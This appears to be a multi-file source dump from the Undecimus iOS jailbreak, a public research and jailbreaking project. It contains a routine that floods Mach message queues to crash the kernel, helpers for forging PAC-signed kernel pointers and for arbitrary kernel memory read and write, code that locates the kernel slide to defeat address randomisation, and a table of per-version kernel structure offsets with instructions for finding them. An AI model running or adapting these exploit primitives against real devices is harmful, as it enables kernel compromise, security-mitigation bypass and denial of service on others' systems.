3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 4/20/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include "kalloc_crash.h"
13 |
14 | struct simple_msg
15 | {
16 | mach_msg_header_t hdr;
17 | char buf[0];
18 | };
19 |
20 | /* credits to ian beer */
21 | static mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size)
22 | {
23 | // allocate a port to send the messages to
24 | mach_port_t q = MACH_PORT_NULL;
25 | kern_return_t err;
26 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
27 | if (err != KERN_SUCCESS)
28 | {
29 | printf(" [-] failed to allocate port\n");
30 | exit(EXIT_FAILURE);
31 | }
32 |
33 | mach_port_limits_t limits = {0};
34 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
35 | err = mach_port_set_attributes(mach_task_self(),
36 | q,
37 | MACH_PORT_LIMITS_INFO,
38 | (mach_port_info_t)&limits,
39 | MACH_PORT_LIMITS_INFO_COUNT);
40 | if (err != KERN_SUCCESS)
41 | {
42 | printf(" [-] failed to increase queue limit\n");
43 | exit(EXIT_FAILURE);
44 | }
45 |
46 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;
47 | struct simple_msg *msg = malloc(msg_size);
48 | memset(msg, 0, sizeof(struct simple_msg));
49 | memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);
50 |
51 | for (int i = 0; i < 256; i++)
52 | {
53 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
54 | msg->hdr.msgh_size = msg_size;
55 | msg->hdr.msgh_remote_port = q;
56 | msg->hdr.msgh_local_port = MACH_PORT_NULL;
57 | msg->hdr.msgh_id = 0x41414142;
58 |
59 | err = mach_msg(&msg->hdr,
60 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
61 | msg_size,
62 | 0,
63 | MACH_PORT_NULL,
64 | MACH_MSG_TIMEOUT_NONE,
65 | MACH_PORT_NULL);
66 |
67 | if (err != KERN_SUCCESS)
68 | {
69 | printf(" [-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err));
70 | exit(EXIT_FAILURE);
71 | }
72 | }
73 |
74 | return q;
75 | }
76 |
77 | static uint32_t message_size_for_kalloc_size(uint32_t size)
78 | {
79 | return ((size * 3) / 4) - 0x74;
80 | }
81 |
82 | void do_kalloc_crash() {
83 | for (;;) {
84 | uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
85 | uint8_t *body = malloc(body_size);
86 | memset(body, 0x41, body_size);
87 | send_kalloc_message(body, body_size);
88 | SafeFreeNULL(body);
89 | }
90 | }
91 |
--------------------------------------------------------------------------------
/Undecimus/source/kalloc_crash.h:
--------------------------------------------------------------------------------
1 | //
2 | // panic.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 4/20/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef panic_h
10 | #define panic_h
11 |
12 | #include
13 |
14 | void do_kalloc_crash(void);
15 |
16 | #endif /* panic_h */
17 |
--------------------------------------------------------------------------------
/Undecimus/source/kc_parameters.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call/kc_parameters.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL__KC_PARAMETERS_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL__KC_PARAMETERS_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #include "parameters.h"
13 |
14 | #ifdef KERNEL_CALL_PARAMETERS_EXTERN
15 | #define extern KERNEL_CALL_PARAMETERS_EXTERN
16 | #endif
17 |
18 | // A structure describing the PAC codes used as part of the context for signing and verifying
19 | // virtual method pointers in a vtable.
20 | struct vtable_pac_codes {
21 | size_t count;
22 | const uint16_t *codes;
23 | };
24 |
25 | // Generate the name for an offset in a virtual method table.
26 | #define VTABLE_INDEX(class_, method_) _##class_##_##method_##__vtable_index_
27 |
28 | // Generate the name for a list of vtable PAC codes.
29 | #define VTABLE_PAC_CODES(class_) _##class_##__vtable_pac_codes_
30 |
31 | // A helper macro for INIT_VTABLE_PAC_CODES().
32 | #define VTABLE_PAC_CODES_DATA(class_) _##class_##__vtable_pac_codes_data_
33 |
34 | // Initialize a list of vtable PAC codes. In order to store the PAC code array in constant memory,
35 | // we place it in a static variable. Consequently, this macro will produce name conflicts if used
36 | // outside a function.
37 | #define INIT_VTABLE_PAC_CODES(class_, ...) \
38 | static const uint16_t VTABLE_PAC_CODES_DATA(class_)[] = { __VA_ARGS__ }; \
39 | VTABLE_PAC_CODES(class_) = (struct vtable_pac_codes) { \
40 | .count = sizeof(VTABLE_PAC_CODES_DATA(class_)) / sizeof(uint16_t), \
41 | .codes = (const uint16_t *) VTABLE_PAC_CODES_DATA(class_), \
42 | }
43 |
44 | extern uint64_t ADDRESS(paciza_pointer__l2tp_domain_module_start);
45 | extern uint64_t ADDRESS(paciza_pointer__l2tp_domain_module_stop);
46 | extern uint64_t ADDRESS(l2tp_domain_inited);
47 | extern uint64_t ADDRESS(sysctl__net_ppp_l2tp);
48 | extern uint64_t ADDRESS(sysctl_unregister_oid);
49 | extern uint64_t ADDRESS(mov_x0_x4__br_x5);
50 | extern uint64_t ADDRESS(mov_x9_x0__br_x1);
51 | extern uint64_t ADDRESS(mov_x10_x3__br_x6);
52 | extern uint64_t ADDRESS(kernel_forge_pacia_gadget);
53 | extern uint64_t ADDRESS(kernel_forge_pacda_gadget);
54 | extern uint64_t ADDRESS(IOUserClient__vtable);
55 | extern uint64_t ADDRESS(IORegistryEntry__getRegistryEntryID);
56 |
57 | extern size_t SIZE(kernel_forge_pacxa_gadget_buffer);
58 | extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, first_access);
59 | extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result);
60 | extern size_t OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result);
61 |
62 | extern struct vtable_pac_codes VTABLE_PAC_CODES(IOAudio2DeviceUserClient);
63 | extern struct vtable_pac_codes VTABLE_PAC_CODES(IODTNVRAM);
64 |
65 | // Parameters for IOAudio2DeviceUserClient.
66 | extern size_t OFFSET(IOAudio2DeviceUserClient, traps);
67 |
68 | // Parameters for IOExternalTrap.
69 | extern size_t SIZE(IOExternalTrap);
70 | extern size_t OFFSET(IOExternalTrap, object);
71 | extern size_t OFFSET(IOExternalTrap, function);
72 | extern size_t OFFSET(IOExternalTrap, offset);
73 |
74 | // Parameters for IORegistryEntry.
75 | extern size_t OFFSET(IORegistryEntry, reserved);
76 | extern size_t OFFSET(IORegistryEntry__ExpansionData, fRegistryEntryID);
77 |
78 | // Parameters for IOUserClient.
79 | extern uint32_t VTABLE_INDEX(IOUserClient, getExternalTrapForIndex);
80 | extern uint32_t VTABLE_INDEX(IOUserClient, getTargetAndTrapForIndex);
81 |
82 | /*
83 | * kernel_call_parameters_init
84 | *
85 | * Description:
86 | * Initialize the addresses used in the kernel_call subsystem.
87 | */
88 | bool kernel_call_parameters_init(void);
89 |
90 | #undef extern
91 |
92 | #endif
93 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_call.c:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call.c
3 | * Brandon Azad
4 | */
5 | #include "kernel_call.h"
6 |
7 | #include
8 |
9 | #include "pac.h"
10 | #include "user_client.h"
11 | #include "log.h"
12 |
13 | // ---- Public API --------------------------------------------------------------------------------
14 |
15 | bool
16 | kernel_call_init() {
17 | bool ok = stage1_kernel_call_init()
18 | && stage2_kernel_call_init()
19 | && stage3_kernel_call_init();
20 | if (!ok) {
21 | kernel_call_deinit();
22 | }
23 | return ok;
24 | }
25 |
26 | void
27 | kernel_call_deinit() {
28 | stage3_kernel_call_deinit();
29 | stage2_kernel_call_deinit();
30 | stage1_kernel_call_deinit();
31 | }
32 |
33 | uint32_t
34 | kernel_call_7(uint64_t function, size_t argument_count, ...) {
35 | assert(argument_count <= 7);
36 | uint64_t arguments[7];
37 | va_list ap;
38 | va_start(ap, argument_count);
39 | for (size_t i = 0; i < argument_count && i < 7; i++) {
40 | arguments[i] = va_arg(ap, uint64_t);
41 | }
42 | va_end(ap);
43 | return kernel_call_7v(function, argument_count, arguments);
44 | }
45 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_call.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /*
13 | * kernel_call_init
14 | *
15 | * Description:
16 | * Initialize kernel_call functions.
17 | */
18 | bool kernel_call_init(void);
19 |
20 | /*
21 | * kernel_call_deinit
22 | *
23 | * Description:
24 | * Deinitialize the kernel call subsystem and restore the kernel to a safe state.
25 | */
26 | void kernel_call_deinit(void);
27 |
28 | /*
29 | * kernel_call_7
30 | *
31 | * Description:
32 | * Call a kernel function with the specified arguments.
33 | *
34 | * Restrictions:
35 | * See kernel_call_7v().
36 | */
37 | uint32_t kernel_call_7(uint64_t function, size_t argument_count, ...);
38 |
39 | /*
40 | * kernel_call_7v
41 | *
42 | * Description:
43 | * Call a kernel function with the specified arguments.
44 | *
45 | * Restrictions:
46 | * At most 7 arguments can be passed.
47 | * arguments[0] must be nonzero.
48 | * The return value is truncated to 32 bits.
49 | */
50 | uint32_t kernel_call_7v(uint64_t function, size_t argument_count, const uint64_t arguments[]);
51 |
52 | /*
53 | * kernel_forge_pacia
54 | *
55 | * Description:
56 | * Forge a PACIA pointer using the kernel forging gadget.
57 | */
58 | uint64_t kernel_forge_pacia(uint64_t pointer, uint64_t context);
59 |
60 | /*
61 | * kernel_forge_pacia_with_type
62 | *
63 | * Description:
64 | * Forge a PACIA pointer using the specified address, with the upper 16 bits replaced by the
65 | * type code, as context.
66 | */
67 | uint64_t kernel_forge_pacia_with_type(uint64_t pointer, uint64_t address, uint16_t type);
68 |
69 | /*
70 | * kernel_forge_pacda
71 | *
72 | * Description:
73 | * Forge a PACDA pointer using the kernel forging gadget.
74 | */
75 | uint64_t kernel_forge_pacda(uint64_t pointer, uint64_t context);
76 |
77 | /*
78 | * kernel_xpaci
79 | *
80 | * Description:
81 | * Strip a PACIx code from a kernel pointer.
82 | */
83 | uint64_t kernel_xpaci(uint64_t pointer);
84 |
85 | /*
86 | * kernel_xpacd
87 | *
88 | * Description:
89 | * Strip a PACDx code from a kernel pointer.
90 | */
91 | uint64_t kernel_xpacd(uint64_t pointer);
92 |
93 | #endif
94 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_memory.c:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_memory.c
3 | * Brandon Azad
4 | */
5 | #define KERNEL_MEMORY_EXTERN
6 | #include "kernel_memory.h"
7 |
8 | #include "log.h"
9 | #include "mach_vm.h"
10 | #include "parameters.h"
11 |
12 | // ---- Kernel memory functions -------------------------------------------------------------------
13 |
14 | bool
15 | kernel_read(uint64_t address, void *data, size_t size) {
16 | extern bool rkbuffer(uint64_t kaddr, void* buffer, size_t length);
17 | return rkbuffer(address, data, size);
18 | }
19 |
20 | bool
21 | kernel_write(uint64_t address, const void *data, size_t size) {
22 | extern bool wkbuffer(uint64_t kaddr, void* buffer, size_t length);
23 | return wkbuffer(address, (void *)data, size);
24 | }
25 |
26 | uint8_t
27 | kernel_read8(uint64_t address) {
28 | uint8_t value;
29 | bool ok = kernel_read(address, &value, sizeof(value));
30 | if (!ok) {
31 | return -1;
32 | }
33 | return value;
34 | }
35 |
36 | uint16_t
37 | kernel_read16(uint64_t address) {
38 | uint16_t value;
39 | bool ok = kernel_read(address, &value, sizeof(value));
40 | if (!ok) {
41 | return -1;
42 | }
43 | return value;
44 | }
45 |
46 | uint32_t
47 | kernel_read32(uint64_t address) {
48 | uint32_t value;
49 | bool ok = kernel_read(address, &value, sizeof(value));
50 | if (!ok) {
51 | return -1;
52 | }
53 | return value;
54 | }
55 |
56 | uint64_t
57 | kernel_read64(uint64_t address) {
58 | uint64_t value;
59 | bool ok = kernel_read(address, &value, sizeof(value));
60 | if (!ok) {
61 | return -1;
62 | }
63 | return value;
64 | }
65 |
66 | bool
67 | kernel_write8(uint64_t address, uint8_t value) {
68 | return kernel_write(address, &value, sizeof(value));
69 | }
70 |
71 | bool
72 | kernel_write16(uint64_t address, uint16_t value) {
73 | return kernel_write(address, &value, sizeof(value));
74 | }
75 |
76 | bool
77 | kernel_write32(uint64_t address, uint32_t value) {
78 | return kernel_write(address, &value, sizeof(value));
79 | }
80 |
81 | bool
82 | kernel_write64(uint64_t address, uint64_t value) {
83 | return kernel_write(address, &value, sizeof(value));
84 | }
85 |
86 | // ---- Kernel utility functions ------------------------------------------------------------------
87 |
88 | bool
89 | kernel_ipc_port_lookup(uint64_t task, mach_port_name_t port_name,
90 | uint64_t *ipc_port, uint64_t *ipc_entry) {
91 | // Get the task's ipc_space.
92 | uint64_t itk_space = kernel_read64(task + OFFSET(task, itk_space));
93 | // Get the size of the table.
94 | uint32_t is_table_size = kernel_read32(itk_space + OFFSET(ipc_space, is_table_size));
95 | // Get the index of the port and check that it is in-bounds.
96 | uint32_t port_index = MACH_PORT_INDEX(port_name);
97 | if (port_index >= is_table_size) {
98 | return false;
99 | }
100 | // Get the space's is_table and compute the address of this port's entry.
101 | uint64_t is_table = kernel_read64(itk_space + OFFSET(ipc_space, is_table));
102 | uint64_t entry = is_table + port_index * SIZE(ipc_entry);
103 | if (ipc_entry != NULL) {
104 | *ipc_entry = entry;
105 | }
106 | // Get the address of the port if requested.
107 | if (ipc_port != NULL) {
108 | *ipc_port = kernel_read64(entry + OFFSET(ipc_entry, ie_object));
109 | }
110 | return true;
111 | }
112 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_memory.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_memory.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_MEMORY_H_
6 | #define VOUCHER_SWAP__KERNEL_MEMORY_H_
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #ifdef KERNEL_MEMORY_EXTERN
14 | #define extern KERNEL_MEMORY_EXTERN
15 | #endif
16 |
17 | /*
18 | * kernel_task_port
19 | *
20 | * Description:
21 | * The kernel task port.
22 | */
23 | extern mach_port_t kernel_task_port;
24 |
25 | /*
26 | * kernel_task
27 | *
28 | * Description:
29 | * The address of the kernel_task in kernel memory.
30 | */
31 | extern uint64_t kernel_task;
32 |
33 | /*
34 | * current_task
35 | *
36 | * Description:
37 | * The address of the current task in kernel memory.
38 | */
39 | extern uint64_t current_task;
40 |
41 | /*
42 | * kernel_read
43 | *
44 | * Description:
45 | * Read data from kernel memory.
46 | */
47 | bool kernel_read(uint64_t address, void *data, size_t size);
48 |
49 | /*
50 | * kernel_write
51 | *
52 | * Description:
53 | * Write data to kernel memory.
54 | */
55 | bool kernel_write(uint64_t address, const void *data, size_t size);
56 |
57 | /*
58 | * kernel_read8
59 | *
60 | * Description:
61 | * Read a single byte from kernel memory. If the read fails, -1 is returned.
62 | */
63 | uint8_t kernel_read8(uint64_t address);
64 |
65 | /*
66 | * kernel_read16
67 | *
68 | * Description:
69 | * Read a 16-bit value from kernel memory. If the read fails, -1 is returned.
70 | */
71 | uint16_t kernel_read16(uint64_t address);
72 |
73 | /*
74 | * kernel_read32
75 | *
76 | * Description:
77 | * Read a 32-bit value from kernel memory. If the read fails, -1 is returned.
78 | */
79 | uint32_t kernel_read32(uint64_t address);
80 |
81 | /*
82 | * kernel_read64
83 | *
84 | * Description:
85 | * Read a 64-bit value from kernel memory. If the read fails, -1 is returned.
86 | */
87 | uint64_t kernel_read64(uint64_t address);
88 |
89 | /*
90 | * kernel_write8
91 | *
92 | * Description:
93 | * Write a single byte to kernel memory.
94 | */
95 | bool kernel_write8(uint64_t address, uint8_t value);
96 |
97 | /*
98 | * kernel_write16
99 | *
100 | * Description:
101 | * Write a 16-bit value to kernel memory.
102 | */
103 | bool kernel_write16(uint64_t address, uint16_t value);
104 |
105 | /*
106 | * kernel_write32
107 | *
108 | * Description:
109 | * Write a 32-bit value to kernel memory.
110 | */
111 | bool kernel_write32(uint64_t address, uint32_t value);
112 |
113 | /*
114 | * kernel_write64
115 | *
116 | * Description:
117 | * Write a 64-bit value to kernel memory.
118 | */
119 | bool kernel_write64(uint64_t address, uint64_t value);
120 |
121 | /*
122 | * kernel_ipc_port_lookup
123 | *
124 | * Description:
125 | * Get the address of the ipc_port and ipc_entry for a Mach port name.
126 | */
127 | bool kernel_ipc_port_lookup(uint64_t task, mach_port_name_t port_name,
128 | uint64_t *ipc_port, uint64_t *ipc_entry);
129 |
130 | #undef extern
131 |
132 | #endif
133 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_slide.c:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_slide.c
3 | * Brandon Azad
4 | */
5 | #define KERNEL_SLIDE_EXTERN
6 | #include "kernel_slide.h"
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #include "kernel_memory.h"
13 | #include "log.h"
14 | #include "parameters.h"
15 | #include "platform.h"
16 |
17 | uint64_t kernel_slide = -1;
18 |
19 | /*
20 | * is_kernel_base
21 | *
22 | * Description:
23 | * Checks if the given address is the kernel base.
24 | */
25 | static bool
26 | is_kernel_base(uint64_t base) {
27 | // Read the data at the base address as a Mach-O header.
28 | struct mach_header_64 header = {};
29 | bool ok = kernel_read(base, &header, sizeof(header));
30 | if (!ok) {
31 | return false;
32 | }
33 | // Validate that this looks like the kernel base. We don't check the CPU subtype since it
34 | // may not exactly match the current platform's CPU subtype (e.g. on iPhone10,1,
35 | // header.cpusubtype is CPU_SUBTYPE_ARM64_ALL while platform.cpu_subtype is
36 | // CPU_SUBTYPE_ARM64_V8).
37 | if (!(header.magic == MH_MAGIC_64
38 | && header.cputype == platform.cpu_type
39 | && header.filetype == MH_EXECUTE
40 | && header.ncmds > 2)) {
41 | return false;
42 | }
43 | return true;
44 | }
45 |
46 | bool
47 | kernel_slide_init() {
48 | if (kernel_slide != -1) {
49 | return true;
50 | }
51 | // Get the address of the host port.
52 | mach_port_t host = mach_host_self();
53 | assert(MACH_PORT_VALID(host));
54 | uint64_t host_port;
55 | bool ok = kernel_ipc_port_lookup(current_task, host, &host_port, NULL);
56 | mach_port_deallocate(mach_task_self(), host);
57 | if (!ok) {
58 | ERROR("could not lookup host port");
59 | return false;
60 | }
61 | // Get the address of realhost.
62 | uint64_t realhost = kernel_read64(host_port + OFFSET(ipc_port, ip_kobject));
63 | return kernel_slide_init_with_kernel_image_address(realhost);
64 | }
65 |
66 | bool
67 | kernel_slide_init_with_kernel_image_address(uint64_t address) {
68 | if (kernel_slide != -1) {
69 | return true;
70 | }
71 | // Find the highest possible kernel base address that could still correspond to the given
72 | // kernel image address.
73 | uint64_t base = STATIC_ADDRESS(kernel_base);
74 | assert(address > base);
75 | base = base + ((address - base) / kernel_slide_step) * kernel_slide_step;
76 | // Now walk backwards from that kernel base one kernel slide at a time until we find the
77 | // real kernel base.
78 | while (base >= STATIC_ADDRESS(kernel_base)) {
79 | bool found = is_kernel_base(base);
80 | if (found) {
81 | kernel_slide = base - STATIC_ADDRESS(kernel_base);
82 | DEBUG_TRACE(1, "found kernel slide 0x%016llx", kernel_slide);
83 | return true;
84 | }
85 | base -= kernel_slide_step;
86 | }
87 | ERROR("could not find kernel base");
88 | ERROR("could not determine kernel slide");
89 | return false;
90 | }
91 |
--------------------------------------------------------------------------------
/Undecimus/source/kernel_slide.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_slide.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_SLIDE_H_
6 | #define VOUCHER_SWAP__KERNEL_SLIDE_H_
7 |
8 | #include
9 | #include
10 |
11 | /*
12 | * kernel_slide
13 | *
14 | * Description:
15 | * The kASLR slide.
16 | */
17 | extern uint64_t kernel_slide;
18 |
19 | /*
20 | * kernel_slide_init
21 | *
22 | * Description:
23 | * Find the value of the kernel slide using kernel_read() and current_task.
24 | */
25 | bool kernel_slide_init(void);
26 |
27 | /*
28 | * kernel_slide_init_with_kernel_image_address
29 | *
30 | * Description:
31 | * Find the value of the kernel slide using kernel_read(), starting with an address that is
32 | * known to reside within the kernel image.
33 | */
34 | bool kernel_slide_init_with_kernel_image_address(uint64_t address);
35 |
36 | #undef extern
37 |
38 | #endif
39 |
--------------------------------------------------------------------------------
/Undecimus/source/log.c:
--------------------------------------------------------------------------------
1 | /*
2 | * log.c
3 | * Brandon Azad
4 | */
5 | #include "log.h"
6 |
7 | #include
8 | #include
9 | #include
10 | #import
11 |
12 | void
13 | log_internal(char type, const char *format, ...) {
14 | if (log_implementation != NULL) {
15 | va_list ap;
16 | va_start(ap, format);
17 | log_implementation(type, format, ap);
18 | va_end(ap);
19 | }
20 | }
21 |
22 | // The default logging implementation prints to stderr with a nice hacker prefix.
23 | static void
24 | log_stderr(char type, const char *format, va_list ap) {
25 | char *message = NULL;
26 | vasprintf(&message, format, ap);
27 | assert(message != NULL);
28 | switch (type) {
29 | case 'D': type = 'D'; break;
30 | case 'I': type = '+'; break;
31 | case 'W': type = '!'; break;
32 | case 'E': type = '-'; break;
33 | }
34 | RAWLOG("[%c] %s\n", type, message);
35 | SafeFreeNULL(message);
36 | }
37 |
38 | void (*log_implementation)(char type, const char *format, va_list ap) = log_stderr;
39 |
--------------------------------------------------------------------------------
/Undecimus/source/log.h:
--------------------------------------------------------------------------------
1 | /*
2 | * log.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__LOG_H_
6 | #define VOUCHER_SWAP__LOG_H_
7 |
8 | #include
9 | #include
10 |
11 | /*
12 | * log_implementation
13 | *
14 | * Description:
15 | * This is the log handler that will be executed when code wants to log a message. The default
16 | * implementation logs the message to stderr. Setting this value to NULL will disable all
17 | * logging. Specify a custom log handler to process log messages in another way.
18 | *
19 | * Parameters:
20 | * type A character representing the type of message that is being
21 | * logged.
22 | * format A printf-style format string describing the error message.
23 | * ap The variadic argument list for the format string.
24 | *
25 | * Log Type:
26 | * The type parameter is one of:
27 | * - D: Debug: Used for debugging messages. Set the DEBUG build variable to control debug
28 | * verbosity.
29 | * - I: Info: Used to convey general information about the exploit or its progress.
30 | * - W: Warning: Used to indicate that an unusual but possibly recoverable condition was
31 | * encountered.
32 | * - E: Error: Used to indicate that an unrecoverable error was encountered. The code
33 | * might continue running after an error was encountered, but it probably will
34 | * not succeed.
35 | */
36 | extern void (*log_implementation)(char type, const char *format, va_list ap);
37 |
38 | #define DEBUG_LEVEL(level) (DEBUG && level <= DEBUG)
39 |
40 | #if DEBUG
41 | #define DEBUG_TRACE(level, fmt, ...) \
42 | do { \
43 | if (DEBUG_LEVEL(level)) { \
44 | log_internal('D', fmt, ##__VA_ARGS__); \
45 | } \
46 | } while (0)
47 | #else
48 | #define DEBUG_TRACE(level, fmt, ...) do {} while (0)
49 | #endif
50 | #define INFO(fmt, ...) log_internal('I', fmt, ##__VA_ARGS__)
51 | #define WARNING(fmt, ...) log_internal('W', fmt, ##__VA_ARGS__)
52 | #define ERROR(fmt, ...) log_internal('E', fmt, ##__VA_ARGS__)
53 |
54 | // A function to call the logging implementation.
55 | void log_internal(char type, const char *format, ...) __printflike(2, 3);
56 |
57 | #endif
58 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap2_pwn.h:
--------------------------------------------------------------------------------
1 | #ifndef MACHSWAP2_PWN_H
2 | #define MACHSWAP2_PWN_H
3 |
4 | #include
5 |
6 | #include "common.h"
7 | #include "machswap_offsets.h"
8 |
9 | kern_return_t machswap2_exploit(machswap_offsets_t *offsets);
10 |
11 | #endif
12 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap_offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef MACHSWAP_OFFSETS_H
2 | #define MACHSWAP_OFFSETS_H
3 |
4 | typedef struct {
5 | struct {
6 | /* strings kernel | grep 'Darwin' */
7 | const char *release;
8 |
9 | cpu_type_t cpu_type;
10 | /* CPU_SUBTYPE for supported */
11 | cpu_subtype_t cpu_subtype;
12 |
13 | /* basically will always be: 0xfffffff007004000 */
14 | uint64_t kernel_image_base;
15 | } constant;
16 |
17 | struct {
18 | /*
19 | nm kernel | grep '_proc_pid'
20 | 'ldr w0, [x0, #offset]
21 | */
22 | uint32_t proc_pid;
23 |
24 | /*
25 | nm kernel | grep '_proc_task'
26 | 'ldr x0, [x0, #offset]
27 | */
28 | uint32_t proc_task;
29 |
30 | /*
31 | nm kernel | grep '_proc_ucred'
32 | 'ldr x0, [x0, #offset]
33 | */
34 | uint32_t proc_ucred;
35 |
36 | /*
37 | nm kernel | grep '_get_task_map'
38 | 'ldr x0, [x0, #offset]
39 | */
40 | uint32_t task_vm_map;
41 |
42 | /*
43 | nm kernel | grep '_get_bsdtask_info'
44 | 'ld rx0, [x0, #offset]
45 | */
46 | uint32_t task_bsd_info;
47 |
48 | /*
49 | joker -m kernel | grep 'task_self_trap'
50 | go into 'bl' call
51 | near the start of the func, just after _lck_mtx_lock,
52 | it will load two values from a reg and compare them
53 | one is later loaded into x0, this is the one you *dont'* want
54 | you need the offset of the one which *isn't* later loaded into x0
55 | ldr xN, [xN, #offset]
56 | image: https://i.imgur.com/RlauIez.png
57 | */
58 | uint32_t task_itk_self;
59 |
60 | /*
61 | joker -m kernel | grep mach_ports_lookup
62 | about 1/3rd the way into the func it will load a value from a reg,
63 | call a function, and store the return value, 3 times in a row
64 | it will load from 3 offsets such as 0x2F0, 0x2F8, and 0x300 (notice they are all contiguous)
65 | the lowest of the three offsets is the one you want
66 | image: https://i.imgur.com/0M1mUSM.png
67 | (note the repeating pattern of 'ldr x0, [x20, #offset]', 'bl identical_func', 'str x0, [x21 #off]')
68 | */
69 | uint32_t task_itk_registered;
70 |
71 | /*
72 | joker -m kernel | grep 'task_info'
73 | about halfway down the func, just before a _task_deallocate call, it will
74 | load reg x0-x3, and then call a func
75 | within that func there is a jumptable, you need to find case 17 (TASK_DYLD_INFO)
76 | in here it will do two loads and stores, the first load is your _image_info_addr offset,
77 | the second is your _image_info_size offset (however this should be the _info_addr offset +0x8)
78 | image: https://i.imgur.com/WpG6Ub6.png
79 | */
80 | uint32_t task_all_image_info_addr;
81 | uint32_t task_all_image_info_size;
82 | } struct_offsets;
83 |
84 | struct {
85 | /*
86 | if IOSurface::create_surface fails, this offset being wrong is why
87 | you can find the offset manually, but it's usually either
88 | 0x6c8 for 11.0.x, 0xbc8 for 11.1.x-11.4.x, or 0xdd0 for 12.x
89 | */
90 | uint32_t create_outsize;
91 |
92 | /*
93 | iometa -Csov IOUserClient kernel | grep 'getExternalTrapForIndex'
94 | take the index (usually 0x5b8) and divide by 0x8
95 | */
96 | uint32_t get_external_trap_for_index;
97 | } iosurface;
98 | } machswap_offsets_t;
99 |
100 | machswap_offsets_t *get_machswap_offsets(void);
101 |
102 | #endif
103 |
--------------------------------------------------------------------------------
/Undecimus/source/machswap_offsets.m:
--------------------------------------------------------------------------------
1 | #include
2 | #include // strcmp, strerror
3 | #include // uname
4 |
5 | #include "common.h" // LOG, kptr_t
6 | #include "machswap_offsets.h"
7 |
8 | static machswap_offsets_t *machswap_offsets[] =
9 | {
10 | &(machswap_offsets_t)
11 | {
12 | .constant =
13 | {
14 | .release = "18.",
15 | .cpu_subtype = CPU_SUBTYPE_ARM64E,
16 | .kernel_image_base = 0xfffffff007004000,
17 | },
18 | .struct_offsets =
19 | {
20 | .proc_pid = 0x60,
21 | .proc_task = 0x10,
22 | .proc_ucred = 0xf8,
23 | .task_vm_map = 0x20,
24 | .task_bsd_info = 0x368,
25 | .task_itk_self = 0xd8,
26 | .task_itk_registered = 0x2e8,
27 | .task_all_image_info_addr = 0x3a8,
28 | .task_all_image_info_size = 0x3b0,
29 | },
30 | .iosurface =
31 | {
32 | .create_outsize = 0xdd0,
33 | .get_external_trap_for_index = 0xb7,
34 | },
35 | },
36 | &(machswap_offsets_t)
37 | {
38 | .constant =
39 | {
40 | .release = "18.",
41 | .cpu_subtype = CPU_SUBTYPE_ARM64_V8,
42 | .kernel_image_base = 0xfffffff007004000,
43 | },
44 | .struct_offsets =
45 | {
46 | .proc_pid = 0x60,
47 | .proc_task = 0x10,
48 | .proc_ucred = 0xf8,
49 | .task_vm_map = 0x20,
50 | .task_bsd_info = 0x358,
51 | .task_itk_self = 0xd8,
52 | .task_itk_registered = 0x2e8,
53 | .task_all_image_info_addr = 0x398,
54 | .task_all_image_info_size = 0x3a0,
55 | },
56 | .iosurface =
57 | {
58 | .create_outsize = 0xdd0,
59 | .get_external_trap_for_index = 0xb7,
60 | },
61 | },
62 | &(machswap_offsets_t)
63 | {
64 | .constant =
65 | {
66 | .release = "17.",
67 | .cpu_subtype = CPU_SUBTYPE_ARM_ALL,
68 | .kernel_image_base = 0xfffffff007004000,
69 | },
70 | .struct_offsets =
71 | {
72 | .proc_pid = 0x10,
73 | .proc_task = 0x18,
74 | .proc_ucred = 0x100,
75 | .task_vm_map = 0x20,
76 | .task_bsd_info = 0x368,
77 | .task_itk_self = 0xd8,
78 | .task_itk_registered = 0x2f0,
79 | .task_all_image_info_addr = 0x3a8,
80 | .task_all_image_info_size = 0x3b0,
81 | },
82 | .iosurface =
83 | {
84 | .create_outsize = 0xbc8,
85 | .get_external_trap_for_index = 0xb7,
86 | },
87 | },
88 | NULL,
89 | };
90 |
91 | #include
92 | #include
